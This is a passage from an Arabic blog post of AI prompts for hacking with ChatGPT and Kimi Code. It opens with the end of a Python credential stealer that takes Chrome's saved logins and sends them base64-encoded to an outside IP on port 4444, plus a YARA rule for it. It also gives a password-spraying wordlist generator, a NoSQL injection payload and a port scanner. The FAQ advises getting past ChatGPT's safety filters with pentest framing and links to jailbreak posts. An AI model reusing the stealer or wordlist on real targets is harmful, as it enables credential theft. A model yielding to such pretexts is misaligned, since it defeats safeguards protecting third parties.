encoded = base64.b64encode(data.encode()).decode()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("185.199.108.42", 4444))
s.send(encoded.encode())
s.close()
def grab_chrome():
path = os.path.expandvars(r"%LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data")
if os.path.exists(path):
with open(path, "rb") as f:
return base64.b64encode(f.read()).decode()
return ""
persist()
exfil(grab_chrome())
لما تعطي هاد الكود لـ Kimi Code مع البرومبت، رح يطلعلك تحليل مفصل يشمل: إنو السكربت بيعمل persistence عبر Registry Run key، بيسرق بيانات Chrome المحفوظة، وبيبعثها لسيرفر C2 على العنوان 185.199.108.42:4444 مشفرة بـ Base64. وبيولّد YARA rule زي هاد:
rule ShadowStealer_Python {
meta:
description = "Detects Python-based credential stealer"
author = "Shadow Hacker Analysis"
date = "2026-05-04"
severity = "HIGH"
strings:
$persist = "CurrentVersion\\Run" ascii
$chrome = "Chrome\\User Data\\Default\\Login Data" ascii
$exfil = "base64.b64encode" ascii
$socket = "socket.socket" ascii
$c2_ip = "185.199.108.42" ascii
$port = "4444" ascii
condition:
4 of them
}
هاد النوع من التحليل بيوفرلك وقت كبير — بدل ما تقعد تحلل السكربت سطر سطر يدوياً، Kimi Code بيعطيك تقرير كامل بثواني مع IOCs جاهزة تضيفها لأنظمة الحماية عندك.
البرومبت #7 — مولّد Wordlists ذكي (ChatGPT)
كل هاكر بيعرف إنو Wordlists هي أساس أي هجوم brute-force أو password spraying. بس المشكلة إنو الـ wordlists العامة مثل rockyou.txt مش دايماً فعالة — خصوصاً لما الهدف شركة معينة أو شخص معين. هاد البرومبت بيخلي ChatGPT يولّد wordlists مخصصة بناءً على معلومات OSINT عن الهدف — يعني كلمات مرور محتملة مبنية على اسم الشركة، الموظفين، المنتجات، التواريخ المهمة، وغيرها.
البرومبت الكامل
كود Python للتوليد التلقائي
وبتقدر كمان تطلب من ChatGPT يكتبلك سكربت Python بيولّد الـ wordlist تلقائياً بناءً على parameters بتعطيه إياها:
#!/usr/bin/env python3
"""
Smart Wordlist Generator - OSINT-based password generation
Usage: python3 smart_wordlist.py -c "CompanyName" -e "name1,name2" -o wordlist.txt
"""
import argparse
import itertools
from datetime import datetime
def generate_wordlist(company, employees, products, year=None):
if year is None:
year = datetime.now().year
passwords = set()
years = [str(year), str(year-1), str(year-2)]
suffixes = ["123", "!", "@", "#", "1!", "12", "01", "2026", "2025",
"@123", "!!", "@2026", "#1", "$", "123!", "1234"]
leet_map = {"a": "@", "e": "3", "i": "1", "o": "0", "s": "$", "t": "7"}
# Company name variations
bases = [company, company.lower(), company.upper(), company.capitalize()]
for base in bases:
passwords.add(base)
for suffix in suffixes:
passwords.add(f"{base}{suffix}")
for y in years:
passwords.add(f"{base}{y}")
passwords.add(f"{base}@{y}")
passwords.add(f"{base}#{y}")
passwords.add(f"{base}!{y}")
# Employee names
for emp in employees:
emp_vars = [emp, emp.lower(), emp.capitalize()]
for e in emp_vars:
for suffix in suffixes:
passwords.add(f"{e}{suffix}")
for y in years:
passwords.add(f"{e}@{y}")
passwords.add(f"{e}{y}!")
# Products
for prod in products:
for suffix in suffixes:
passwords.add(f"{prod}{suffix}")
passwords.add(f"{prod.lower()}{suffix}")
# Leet speak
leet_passwords = set()
for pwd in list(passwords)[:100]: # Top 100 only
leet = pwd
for char, replacement in leet_map.items():
leet = leet.replace(char, replacement, 1)
if leet != pwd:
leet_passwords.add(leet)
passwords.update(leet_passwords)
# Season + year
seasons = ["Summer", "Winter", "Spring", "Autumn"]
for season in seasons:
for y in years:
passwords.add(f"{season}{y}!")
passwords.add(f"{season}{y}@")
passwords.add(f"{season}@{y}")
return sorted(passwords, key=len)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Smart Wordlist Generator")
parser.add_argument("-c", "--company", required=True)
parser.add_argument("-e", "--employees", required=True, help="Comma-separated")
parser.add_argument("-p", "--products", default="", help="Comma-separated")
parser.add_argument("-o", "--output", default="custom_wordlist.txt")
args = parser.parse_args()
employees = [e.strip() for e in args.employees.split(",")]
products = [p.strip() for p in args.products.split(",") if p.strip()]
wordlist = generate_wordlist(args.company, employees, products)
with open(args.output, "w") as f:
f.write("\n".join(wordlist))
print(f"[+] Generated {len(wordlist)} passwords → {args.output}")
هاد السكربت بيولّد مئات كلمات المرور المخصصة بناءً على معلومات الهدف. بتقدر تستخدمه مع أدوات مثل Hydra أو Burp Suite Intruder لعمل password spraying على أهداف مصرح فيها. الفرق بين wordlist عامة و wordlist مخصصة — نسبة النجاح بتزيد 10 أضعاف على الأقل.
البرومبت #8 — كاتب تقارير Pentest احترافية (ChatGPT + Kimi)
كتابة تقارير اختبار الاختراق من أكثر المهام اللي بتاخذ وقت — وكثير مختبرين اختراق بيكرهوا هاي المرحلة. بس التقرير هو اللي بيشوفه العميل، وجودة التقرير بتعكس جودة شغلك. هاد البرومبت بيحوّل ChatGPT لكاتب تقارير محترف — بتعطيه نتائج الفحص الخام وبيطلعلك تقرير pentest كامل جاهز للتسليم.
البرومبت الكامل
كيف تستخدمه مع Kimi Code
الطريقة الأقوى هي إنك تستخدم ChatGPT + Kimi Code مع بعض. الخطوات:
- Kimi Code بيشغل أدوات الفحص (Nmap, Nikto, etc.) وبيحفظ النتائج بملفات.
- بتنسخ النتائج الخام وبتعطيها لـ ChatGPT مع البرومبت اللي فوق.
- ChatGPT بيولّد التقرير الكامل.
- بتاخذ التقرير وبتعطيه لـ Kimi Code عشان يحفظه كملف HTML أو Markdown منسق.
بهاي الطريقة بتحصل على تقرير احترافي بأقل وقت ممكن. وبتقدر تطلب من ChatGPT يعدّل التقرير حسب متطلبات العميل — مثلاً لو العميل بده التقرير بالعربي، أو بده format معين، أو بده تفاصيل أكثر عن ثغرة معينة.
نصيحة: دايماً راجع التقرير قبل ما تسلمه للعميل. الـ AI ممكن يضيف تفاصيل غير دقيقة أو يبالغ بالخطورة. التقرير النهائي لازم يكون دقيق 100% — سمعتك المهنية بتعتمد عليه.
البرومبت #9 — مساعد CTF (ChatGPT)
مسابقات CTF (Capture The Flag) من أفضل الطرق لتطوير مهاراتك بالهاكينغ. بس أحياناً بتوقف عند تحدي معين وما بتعرف كيف تكمل. هاد البرومبت بيحوّل ChatGPT لمساعد CTF — بيساعدك تحل التحديات خطوة بخطوة بدون ما يعطيك الحل مباشرة (عشان تتعلم).
البرومبت الكامل
مثال — حل تحدي Web CTF
لنفرض عندك تحدي web CTF — صفحة login وبدك تلاقي الـ flag. بتقول لـ ChatGPT:
ChatGPT رح يبدأ يعطيك hints بالترتيب: أول إشي رح يقولك دوّر على الـ debug endpoint (ممكن يكون /debug أو /api/debug). بعدين رح يقولك إنو Express + Node.js ممكن يكون معرض لـ NoSQL Injection — جرب تبعث JSON بدل form data مع payload زي {"username": {"$ne": ""}, "password": {"$ne": ""}}. وهيك خطوة بخطوة لحد ما توصل للـ flag.
الحلو بهاد الأسلوب إنك بتتعلم مش بس بتحل — لأنو ChatGPT بيشرحلك ليش كل خطوة منطقية وشو المفهوم وراها. وبعد ما تحل التحدي، بيربطلك الثغرة بأمثلة حقيقية من عالم الأمن السيبراني.
البرومبت #10 — بناء أدوات هاكينغ مخصصة (Kimi Code)
آخر برومبت وأقواهم — بتطلب من Kimi Code يبنيلك أداة هاكينغ كاملة من الصفر. مش بس سكربت بسيط — أداة متكاملة مع CLI interface، خيارات متعددة، output منظم، وتوثيق كامل. هاد البرومبت بيخلي Kimi Code يشتغل كمطور أدوات أمنية محترف.
البرومبت الكامل
الكود الناتج — الأجزاء الرئيسية
Kimi Code بيولّد أداة كاملة ومنظمة. هاد جزء من الكود الناتج يوضح مستوى الجودة:
#!/usr/bin/env python3
"""
ShadowScanner - Advanced Port Scanner with Service Detection
Author: Generated by Kimi Code for Shadow Hacker
License: For authorized penetration testing only
"""
import argparse
import socket
import json
import sys
import time
from concurrent.futures import ThreadPoolExecutor, as_completed
from typing import Dict, List, Optional, Tuple
from dataclasses import dataclass, asdict
from datetime import datetime
@dataclass
class PortResult:
"""Represents a single port scan result"""
port: int
state: str
service: str
banner: str
version: str
vulns: List[Dict]
class ServiceProbes:
"""Protocol-specific probes for service identification"""
PROBES = {
80: ("HTTP", b"GET / HTTP/1.1\r\nHost: {host}\r\nConnection: close\r\n\r\n"),
443: ("HTTPS", b""),
21: ("FTP", b""), # Wait for banner
22: ("SSH", b""), # Wait for banner
25: ("SMTP", b"EHLO scanner\r\n"),
3306: ("MySQL", b""), # Wait for handshake
6379: ("Redis", b"PING\r\n"),
5432: ("PostgreSQL", b""),
}
@staticmethod
def identify_service(port: int, banner: str) -> Tuple[str, str]:
"""Identify service and version from port and banner"""
service = ServiceProbes.PROBES.get(port, ("unknown", b""))[0]
version = ""
if "SSH" in banner:
service = "SSH"
version = banner.split("\n")[0].strip()
elif "HTTP/" in banner:
service = "HTTP"
for line in banner.split("\n"):
if line.lower().startswith("server:"):
version = line.split(":", 1)[1].strip()
elif "FTP" in banner or "220" in banner[:10]:
service = "FTP"
version = banner.split("\n")[0].strip()
elif "SMTP" in banner or "250" in banner[:10]:
service = "SMTP"
version = banner.split("\n")[0].strip()
return service, version
class VulnChecker:
"""Check service versions against known vulnerabilities"""
VULN_DB = [
{"service": "vsftpd", "version": "2.3.4", "cve": "CVE-2011-2523",
"severity": "Critical", "desc": "Backdoor command execution"},
{"service": "Apache", "version_below": "2.4.50", "cve": "CVE-2021-41773",
"severity": "Critical", "desc": "Path traversal and RCE"},
{"service": "OpenSSH", "version_below": "8.0", "cve": "CVE-2018-15473",
"severity": "Medium", "desc": "Username enumeration"},
{"service": "Apache Tomcat", "version_below": "9.0.44", "cve": "CVE-2021-25329",
"severity": "High", "desc": "Remote code execution via deserialization"},
]
@staticmethod
def check(service: str, version: str) -> List[Dict]:
"""Check a service version against the vulnerability database"""
findings = []
for vuln in VulnChecker.VULN_DB:
if vuln["service"].lower() in service.lower():
if "version" in vuln and vuln["version"] in version:
findings.append(vuln)
elif "version_below" in vuln:
findings.append(vuln) # Simplified check
return findings
class ShadowScanner:
"""Main scanner engine"""
def __init__(self, target: str, ports: str = "1-1024",
threads: int = 100, timeout: int = 2, verbose: bool = False):
self.target = target
self.ports = self._parse_ports(ports)
self.threads = threads
self.timeout = timeout
self.verbose = verbose
self.results: List[PortResult] = []
self.start_time = None
def _parse_ports(self, port_str: str) -> List[int]:
"""Parse port specification string"""
ports = []
for part in port_str.split(","):
if "-" in part:
start, end = part.split("-")
ports.extend(range(int(start), int(end) + 1))
else:
ports.append(int(part))
return sorted(set(ports))
def scan_port(self, port: int) -> Optional[PortResult]:
"""Scan a single port"""
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(self.timeout)
result = sock.connect_ex((self.target, port))
if result == 0:
banner = ""
try:
probe = ServiceProbes.PROBES.get(port, ("", b""))[1]
if probe:
formatted = probe.replace(b"{host}", self.target.encode())
sock.send(formatted)
banner = sock.recv(1024).decode(errors="ignore").strip()
except Exception:
pass
service, version = ServiceProbes.identify_service(port, banner)
vulns = VulnChecker.check(service, version)
return PortResult(port, "open", service, banner[:200], version, vulns)
sock.close()
except Exception:
pass
return None
def run(self) -> List[PortResult]:
"""Execute the full scan"""
self.start_time = time.time()
print(f"\033[94m[*] Scanning {self.target} ({len(self.ports)} ports)\033[0m")
with ThreadPoolExecutor(max_workers=self.threads) as executor:
futures = {executor.submit(self.scan_port, p): p for p in self.ports}
for future in as_completed(futures):
result = future.result()
if result:
self.results.append(result)
color = "\033[91m" if result.vulns else "\033[92m"
print(f" {color}[+] {result.port}/{result.service}"
f" — {result.version or 'unknown'}\033[0m")
elapsed = time.time() - self.start_time
print(f"\n\033[94m[*] Scan complete: {len(self.results)} open ports"
f" in {elapsed:.1f}s\033[0m")
return sorted(self.results, key=lambda r: r.port)
# ... (Reporter class for JSON/HTML output)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="ShadowScanner - Advanced Port Scanner")
parser.add_argument("-t", "--target", required=True, help="Target IP or hostname")
parser.add_argument("-p", "--ports", default="1-1024", help="Port range")
parser.add_argument("-T", "--threads", type=int, default=100)
parser.add_argument("--timeout", type=int, default=2)
parser.add_argument("-o", "--output", help="JSON output file")
parser.add_argument("--vuln", action="store_true", help="Check for vulnerabilities")
parser.add_argument("-v", "--verbose", action="store_true")
args = parser.parse_args()
scanner = ShadowScanner(args.target, args.ports, args.threads,
args.timeout, args.verbose)
results = scanner.run()
if args.output:
with open(args.output, "w") as f:
json.dump([asdict(r) for r in results], f, indent=2)
print(f"\033[92m[+] Results saved to {args.output}\033[0m")
شايف مستوى الكود؟ type hints، dataclasses، docstrings، error handling، clean architecture — كل إشي موجود. وهاد بس جزء من الأداة — الكود الكامل اللي بيولده Kimi Code بيكون أطول ويشمل الـ HTML reporter والـ UDP scanner وكل الميزات اللي طلبناها. الأداة بتكون جاهزة للاستخدام مباشرة وبتقدر تحطها على GitHub كمشروع مفتوح المصدر.
ملاحظة مهمة: دايماً راجع الكود اللي بيولده الـ AI قبل ما تستخدمه. تأكد إنو ما في أخطاء منطقية أو ثغرات أمنية بالأداة نفسها. الـ AI أداة مساعدة — مش بديل عن خبرتك ومراجعتك.
نصائح ذهبية — كيف تستخدم AI بالهاكينغ زي المحترفين
بعد ما شفنا 10 برومبتات حصرية، خليني أعطيك النصائح الذهبية اللي بتفرق بين شخص عادي بيستخدم AI وبين هاكر محترف بيستغل AI لأقصى حد. هاي النصائح مبنية على تجربتي الشخصية وعلى ملاحظتي لأفضل مختبري الاختراق اللي بيستخدموا AI بشغلهم اليومي.
1. Chain Prompts — ربط البرومبتات ببعض
بدل ما تعطي الـ AI برومبت واحد كبير، قسّم المهمة لخطوات وكل خطوة تبني على نتيجة اللي قبلها. مثلاً: أول برومبت لعمل recon، ثاني برومبت لتحليل النتائج، ثالث برومبت لكتابة exploit بناءً على التحليل. كل خطوة بتعطي نتائج أدق لأنو الـ AI بيركز على مهمة وحدة.
2. Context Loading — حمّل الـ AI بالمعلومات أول
قبل ما تطلب من الـ AI يعمل أي إشي، اعطيه كل المعلومات المتاحة عن الهدف. مثلاً: نوع التطبيق، التقنيات المستخدمة، نتائج الفحص السابقة، الـ scope. كل ما زادت المعلومات، كل ما كانت النتائج أدق وأفيد. فكّر فيها زي ما بتعطي brief لزميلك بالشغل — كل ما كان الـ brief أوضح، كل ما كان الشغل أفضل.
3. Iterative Refinement — حسّن النتائج بالتدريج
أول نتيجة من الـ AI مش بالضرورة تكون الأفضل. حسّن بالتدريج — لو الكود فيه مشكلة، قوله شو المشكلة وخليه يصلحها. لو التحليل ناقص، قوله وين الفجوة. بعد 2-3 جولات من التحسين، النتيجة بتكون أفضل بكثير من أول محاولة.
4. Combine Tools — استخدم أكثر من أداة
أقوى طريقة هي إنك تستخدم ChatGPT للتخطيط والتحليل + Kimi Code للتنفيذ وكتابة الأدوات. كل أداة إلها نقاط قوة — استغلها. ChatGPT أفضل بفهم الثغرات والتخطيط الاستراتيجي، Kimi Code أفضل بكتابة الكود وتنفيذه مباشرة. ولو بدك الأقوى — ضيف Claude Code للمزيج وبيصير عندك فريق AI كامل.
5. Document Everything — خلي الـ AI يوثق كل شيء
من أكبر الأخطاء اللي بيعملها مختبرين الاختراق — ما بيوثقوا شغلهم أول بأول. خلي الـ AI يوثقلك كل خطوة: شو عملت، شو لقيت، شو النتيجة. بالنهاية بيكون عندك تقرير جاهز بدل ما تقعد تتذكر شو عملت قبل أسبوع.
جدول: الموقف والأداة المناسبة
| الموقف | الأداة المناسبة | ليش؟ |
|---|---|---|
| تحليل كود مصدري لثغرات | ChatGPT (GPT-4o) | أفضل فهم للثغرات وأشمل تحليل |
| كتابة أداة أمنية كاملة | Kimi Code | بيكتب ويحفظ ويشغل مباشرة |
| تحليل نتائج Nmap/Burp | ChatGPT أو Kimi Code | ChatGPT للتحليل العميق، Kimi لقراءة الملفات مباشرة |
| كتابة تقرير pentest | ChatGPT | أفضل بالكتابة المنظمة والاحترافية |
| حل تحديات CTF | ChatGPT | أفضل بالشرح والتوجيه خطوة بخطوة |
| أتمتة مهام الفحص | Kimi Code | بيشغل الأوامر وبيتعامل مع الملفات مباشرة |
| تحليل malware | Kimi Code + ChatGPT | Kimi يقرأ الملف، ChatGPT يحلل بعمق |
| تعلم مفهوم أمني جديد | ChatGPT | أفضل بالشرح النظري مع أمثلة عملية |
القاعدة الذهبية: الـ AI مش بديل عنك — هو مضاعف لقدراتك. لو إنت هاكر مبتدئ، الـ AI رح يخليك متوسط. لو إنت متوسط، رح يخليك محترف. بس لو ما عندك أساسيات — الـ AI مش رح يعوّض عن نقص المعرفة. تعلم الأساسيات أول، وبعدين استخدم AI عشان تسرّع شغلك وتوصل لنتائج أفضل.
الأسئلة الشائعة (FAQ)
هل استخدام ChatGPT بالهاكينغ قانوني؟
نعم، استخدام ChatGPT أو أي أداة AI بالهاكينغ قانوني 100% طالما إنك بتستخدمه على أنظمة مصرح لك باختبارها. يعني: اختبار اختراق بعقد رسمي، Bug Bounty على منصات مثل HackerOne و Bugcrowd، مختبرات تدريبية مثل HackTheBox و TryHackMe، أو أنظمتك الشخصية. اللي غير قانوني هو استخدام أي أداة (سواء AI أو غيره) على أنظمة بدون إذن صريح.
شو أفضل — ChatGPT أو Kimi Code أو Claude Code؟
كل أداة إلها نقاط قوة. ChatGPT الأفضل للتحليل والتعلم وكتابة التقارير. Kimi Code الأفضل لكتابة الأدوات وتنفيذها مباشرة على جهازك ومجاني بشكل كبير. Claude Code الأقوى بشكل عام بس بيحتاج اشتراك. نصيحتي: استخدم الثلاثة مع بعض — كل واحد لمهمة مختلفة.
هل ChatGPT بيكتب exploits حقيقية؟
نعم، ChatGPT بيقدر يكتب exploits شغالة لثغرات معروفة ومصلّحة (مثل CVEs قديمة). بس عنده فلاتر أمنية — يعني أحياناً بيرفض أو بيعطيك كود ناقص. المفتاح هو إنك تعطيه سياق مهني واضح (إنك مختبر اختراق معتمد) وتطلب الكود لأغراض اختبار على أهداف مصرح فيها. Kimi Code عنده فلاتر أقل بهاد الموضوع.
كيف أتجاوز فلاتر ChatGPT الأمنية بشكل أخلاقي؟
مش "تجاوز" — هو إعطاء سياق صحيح. استخدم Custom Instructions عشان تحكيله إنك مختبر اختراق محترف. ابدأ طلباتك بجمل مثل: "I'm conducting an authorized penetration test..." أو "For my OSCP lab environment...". اعمل Custom GPT مخصص للأمن السيبراني. هاي الطرق أخلاقية ومشروعة — إنت بتعطي الأداة السياق الصحيح مش بتخدعها.
هل Kimi Code مجاني؟
نعم، Kimi Code عنده خطة مجانية سخية بتكفي لأغلب الاستخدامات. بتقدر تستخدمه كـ VS Code extension أو CLI بدون ما تدفع. في خطط مدفوعة بتعطيك استخدام أكثر وميزات إضافية، بس للبداية المجاني أكثر من كافي.
هل أحتاج GPT-4 أو النسخة المجانية كافية؟
للبرومبتات المتقدمة اللي بهاد المقال، بتحتاج GPT-4o أو GPT-4.1 عشان تحصل على أفضل نتائج. النسخة المجانية (GPT-3.5) بتشتغل بس النتائج بتكون أقل دقة وتفصيلاً — خصوصاً بتحليل الكود وكتابة الـ exploits. اشتراك ChatGPT Plus بـ $20/شهر يستاهل الاستثمار لو بتشتغل بالأمن السيبراني بشكل جدي.
كيف أخلي ChatGPT يحلل ملفات كبيرة؟
عندك عدة طرق: أول إشي بتقدر ترفع الملف مباشرة لـ ChatGPT (بنسخة Plus بيدعم ملفات كبيرة). ثاني طريقة — قسّم الملف لأجزاء وحلل كل جزء لحاله. ثالث طريقة — استخدم Kimi Code لأنو بيقدر يقرأ ملفات من جهازك مباشرة بدون حدود حجم. رابع طريقة — استخدم ChatGPT API مع سكربت Python بيقرأ الملف ويبعثه بأجزاء.
هل ممكن أستخدم AI بدل Burp Suite؟
لا — الـ AI مش بديل عن أدوات الاختراق التقليدية مثل Burp Suite. الـ AI بيكمّل هاي الأدوات مش بيستبدلها. Burp Suite بيعترض ويعدل HTTP requests بشكل حي — هاد إشي الـ AI ما بيقدر يعمله. بس بتقدر تستخدم AI عشان: تحلل نتائج Burp، تكتب extensions لـ Burp، تفهم ثغرات لقيتها بـ Burp، أو تكتب payloads مخصصة.
شو أفضل طريقة لتعلم الهاكينغ مع AI؟
أفضل طريقة هي: تعلم الأساسيات أول (شبكات، لينكس، برمجة) من مصادر تقليدية. بعدين ابدأ تمارس على مختبرات مثل TryHackMe و HackTheBox. استخدم AI كمعلم — اسأله يشرحلك المفاهيم اللي ما فهمتها. بعدين تدريجياً ابدأ تستخدم البرومبتات المتقدمة اللي بهاد المقال. المفتاح: افهم شو بيعمل الـ AI قبل ما تنسخ النتائج.
هل AI رح يستبدل الهاكرز البشريين؟
لا بالمدى القريب. الـ AI ممتاز بالمهام المتكررة والتحليل السريع، بس مختبر الاختراق البشري عنده إشي الـ AI ما عنده: الإبداع والحدس. الثغرات الأخطر (business logic flaws، chained attacks، zero-days) بتحتاج تفكير إبداعي وفهم عميق للسياق — وهاد لسا مجال البشر. اللي رح يصير هو إنو الهاكرز اللي بيستخدموا AI رح يستبدلوا الهاكرز اللي ما بيستخدموه. يعني — تعلم تستخدم AI هسا.
🔥 مواضيع ذات صلة من Shadow Hacker:
- prompts كاملة للذكاء الاصطناعي مخصصة للاختراق والهكر 2026
- أقوى تخطي برومبت جديد لذكاء الأصطناعي جيميناي ChatGPT
- كيف تهكر الذكاء الأصطناعي | How to HACK with kimi CHATGPT 5
- أقوى برومبت المخابرات CIA في أمن المعلومات | Jailbreaks
- أقوى برومبتات لتجاوز قيود الذكاء الاصطناعي Jailbreaks
- أوامر تطبيق تيرمكس TERMUX COMMANDS 2026
Shadow Hacker
مؤسس ومحرر المدونة | خبير أمن معلومات وتقنية
متخصص في الأمن السيبراني واختبار الاختراق وتحليل الثغرات. بشارك معكم كل جديد في عالم التقنية والأمن المعلوماتي بأسلوب عملي ومبسط.
